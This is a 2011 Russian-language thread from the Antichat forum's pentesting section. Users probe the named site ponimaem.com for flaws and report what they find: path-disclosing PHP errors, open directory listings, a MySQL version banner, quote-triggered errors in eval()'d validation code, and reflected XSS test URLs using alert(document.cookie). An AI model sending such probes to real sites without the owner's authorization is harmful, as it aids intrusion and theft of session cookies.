HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Этичный хакинг или пентестинг > Проверка на уязвимости
Перезагрузить страницу Проверка на уязвимости сайта
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 22.01.2011, 15:11
zx_su
Новичок
Регистрация: 20.01.2011
Сообщений: 0
С нами: 8057846

Репутация: 0
По умолчанию
Добрый день.

Прошу проверить сайт ponimaem.com на наличие дырок.

Буду очень благодарен.

Прошу прошения, если тему создал не там.
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 22.01.2011, 17:23
~d0s~
Познающий
Регистрация: 17.04.2010
Сообщений: 75
С нами: 8456812

Репутация: 55
По умолчанию
Добавляем спец.символы в куки,видим:

Код:
Warning: session_start() [function.session-start]: The session id contains illegal characters, valid characters are a-z, A-Z, 0-9 and '-,' in /home/otvetp/public_html/ponimaem.com/includes/header.php on line 25

Warning: session_start() [function.session-start]: Cannot send session cookie - headers already sent by (output started at /home/otvetp/public_html/ponimaem.com/includes/header.php:25) in /home/otvetp/public_html/ponimaem.com/includes/header.php on line 25

Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /home/otvetp/public_html/ponimaem.com/includes/header.php:25) in /home/otvetp/public_html/ponimaem.com/includes/header.php on line 25
 
Ответить с цитированием

  #3  
Старый 24.01.2011, 20:14
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
С нами: 9176038

Репутация: 8
По умолчанию
Также есть возможность погулять по папкам

Код:
http://ponimaem.com/includes/

http://ponimaem.com/images/
При попытке постучаться на 3306 порт выплюнуло версию мускула

5.0.91-community
 
Ответить с цитированием

  #4  
Старый 25.01.2011, 04:37
CheatCodeX
Новичок
Регистрация: 12.01.2011
Сообщений: 2
С нами: 8069366

Репутация: 0
По умолчанию
Подставляем ' в поле пароля видим

Код:
Warning: Unexpected character in input: ''' (ASCII=39) state=1 in /home/otvetp/public_html/ponimaem.com/includes/classes/validator.php(26) : eval()'d code on line 1
 
Ответить с цитированием

  #5  
Старый 25.01.2011, 05:31
XAMEHA
Новичок
Регистрация: 15.05.2010
Сообщений: 0
С нами: 8417113

Репутация: 0
По умолчанию
В гостевую требуется капча
 
Ответить с цитированием

  #6  
Старый 25.01.2011, 07:16
Ruslan1817
Постоянный
Регистрация: 17.01.2009
Сообщений: 309
С нами: 9112381

Репутация: 403
По умолчанию
Код:
http://ponimaem.com/gb/index.php?pg=&t=">alert(document.cookie)
какой балбес Acunetix запускал ? )) Вы хоть руками тоже смотрите.
 
Ответить с цитированием

  #7  
Старый 25.01.2011, 09:11
Gedj
Познающий
Регистрация: 15.09.2008
Сообщений: 54
С нами: 9290631

Репутация: 46
По умолчанию
Parse error: syntax error, unexpected T_CONSTANT_ENCAPSED_STRING in /home/otvetp/public_html/ponimaem.com/includes/classes/validator.php(26) : eval()'d code on line 1

Нажимаем регистрация в поле вставляем '
 
Ответить с цитированием

  #8  
Старый 07.12.2011, 22:33
kravch_v
Участник форума
Регистрация: 01.09.2011
Сообщений: 134
С нами: 7735286

Репутация: 1
По умолчанию
XSS

http://ponimaem.com/test.php

Форма:

Код:
alert('xss')
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.